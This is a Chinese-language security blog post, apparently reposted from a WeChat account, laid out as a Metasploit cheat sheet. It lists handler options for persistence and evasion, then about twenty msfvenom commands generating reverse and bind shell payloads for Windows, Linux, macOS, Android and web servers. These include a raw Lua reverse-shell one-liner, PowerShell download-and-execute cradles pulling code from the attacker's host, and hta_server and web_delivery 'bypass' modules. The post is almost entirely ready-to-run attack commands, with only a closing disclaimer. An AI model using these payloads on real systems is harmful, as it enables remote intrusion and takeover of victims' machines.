|
所有话题标签: |
0x01 常用高级参数选项
LHOST:本地IP地址,RHOST:远程IP地址,LPORT:本地/远程端口EXITFUNC:退出方法,EXITFUNC=process(进程),EXITFUNC=thread(线程)set PrependMigrate true 启用迁移进程(默认为:false)set PrependMigrateProc explorer.exe 迁移到此进程名:explorer.exeset SessionExpirationTimeout 0 会话超时时间0秒(会话永不超时),默认为:604800set SessionCommunicationTimeout 0 会话通信超时0秒(会话永不过期),默认为:300set EnableStageEncoding true 启用Stage传输体载荷编码(默认为:false)set EnableUnicodeEncoding true 启用Unicode编码(默认为:false)set stageencoder x86/fnstenv_mov 设置传输编码为:x86/fnstenv_movset HandlerSSLCert /tmp/772023.pem 指定HTTPS PEM格式SSL证书路径set StagerVerifySSLCert true 验证HTTPS SSL证书set ExitOnSession false 退出会话为:false,保持端口监听(默认为:true)set AutoRunScript migrate -f 自动运行migrate脚本,-f或-n参数set InitialAutoRunScript migrate -f 自动运行migrate脚本,优先AutoRunScript
0x02 生成各类常用载荷
msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.1.120 LPORT=443 -f macho > /tmp/mac.macho2. Linux reverse_tcp elf
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.120 LPORT=443 -f elf > /tmp/linux.elf3. Android reverse_tcp apk
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.120 LPORT=443 -f raw > /tmp/android.apk4. Windows reverse_tcp exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.120 LPORT=443 -f exe > /tmp/reverse.exe5. Windows bind_tcp exe
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=999 -f exe > /tmp/bind.exe6. Windows reverse_https exe
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.1.120 LPORT=443 -f exe > /tmp/https.exe命令行执行:C:ProgramDatahttps.exe
7. Windows reverse_tcp dll
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.120 LPORT=443 -f dll > /tmp/dll_x64.dll命令行执行:regsvr32 dll_x64.dllrundll32 C:ProgramDatadll_x64.dll,Start
8. Windows reverse_tcp jar
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.1.120 LPORT=443 -f jar > /tmp/java.jar命令行执行:java -jar "C:ProgramDatajava.jar"
9. Script reverse_tcp aspx
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.120 LPORT=443 -f aspx > /tmp/aspxweb.aspx浏览器访问:http://192.168.1.108/aspxweb.aspx
10. Script reverse_tcp php
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.120 LPORT=443 -f raw > /tmp/phpweb.php浏览器访问:http://192.168.1.108/phpweb.php
11. Script reverse_tcp jsp
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.120 LPORT=443 -f raw > /tmp/jspweb.jsp或者warweb.war浏览器访问:http://192.168.1.108:8080/jspweb.jsp
12. Script reverse_tcp perl
msfvenom -p cmd/unix/reverse_perl LHOST=192.168.1.120 LPORT=443 -f raw > /tmp/perl.pl命令行执行:[/var/www/html/]$ perl /tmp/perl.pl
13. Script reverse_tcp ruby
msfvenom -p cmd/unix/reverse_ruby LHOST=192.168.1.120 LPORT=443 -f raw > /tmp/ruby.rb命令行执行:[/var/www/html/]$ ruby /tmp/ruby.rb
14. Script reverse_tcp python
msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.1.120 LPORT=443 -f raw > /tmp/python.py命令行执行:[/var/www/html/]$ python /tmp/python.py
15. Script reverse_lua lua
msfvenom -p cmd/unix/reverse_lua LHOST=192.168.1.120 LPORT=443 -f raw > /tmp/payload.lua命令行执行:[/var/www/html/]$ lua -e "local s=require('socket');local t=assert(s.tcp());t:connect('192.168.1.120',443);while true do local r,x=t:receive();local f=assert(io.popen(r,'r'));local b=assert(f:read('*a'));t:send(b);end;f:close();t:close();"
16. Script reverse_bash bash
msfvenom -p cmd/unix/reverse_bash LHOST=192.168.1.120 LPORT=443 -f raw > /tmp/payload.sh命令行执行:[/var/www/html/]$ bash /tmp/payload.sh
17. Script reverse_tcp nodejs
msfvenom -p nodejs/shell_reverse_tcp LHOST=192.168.1.120 LPORT=443 -f raw > /tmp/payload.js命令行执行:[/var/www/html/]$ nodejs /tmp/payload.js
18. Bypass hta_server mshta
msf > use exploit/windows/misc/hta_servermsf exploit(windows/misc/hta_server) > set target 1msf exploit(windows/misc/hta_server) > set payload windows/x64/meterpreter/reverse_tcpmsf exploit(windows/misc/hta_server) > set lhost 192.168.1.120msf exploit(windows/misc/hta_server) > set lport 443msf exploit(windows/misc/hta_server) > exploit命令行执行:mshta http://192.168.1.120:8080/xc2Pvkpa3FU6Q.hta
19. Bypass web_delivery powershell
msf > use exploit/multi/script/web_deliverymsf exploit(multi/script/web_delivery) > set target 2msf exploit(multi/script/web_delivery) > set payload windows/x64/meterpreter/reverse_tcpmsf exploit(multi/script/web_delivery) > set lhost 192.168.1.120msf exploit(multi/script/web_delivery) > set lport 443msf exploit(multi/script/web_delivery) > set uripath /msf exploit(multi/script/web_delivery) > exploit命令行执行:powershell.exe -nop -w hidden -c $B=new-object net.webclient;$B.proxy=[Net.WebRequest]::GetSystemWebProxy();$B.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $B.downloadstring('http://192.168.1.120:8080/');
20. Bypass reverse_https powerShell
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.1.120 LPORT=443 -f psh-reflection > /var/www/html/Powershell.ps1msf exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_httpsmsf exploit(multi/handler) > set lhost 192.168.1.120msf exploit(multi/handler) > set lport 443msf exploit(multi/handler) > exploit命令行执行:powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.120/Powershell.ps1'); "
只需在公众号回复“HackTheBox”关键字即可领取一套HTB靶场的学习文档和视频,你还在等什么???
本文始发于微信公众号(贝塔安全实验室):Msfvenom生成各类载荷文件
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论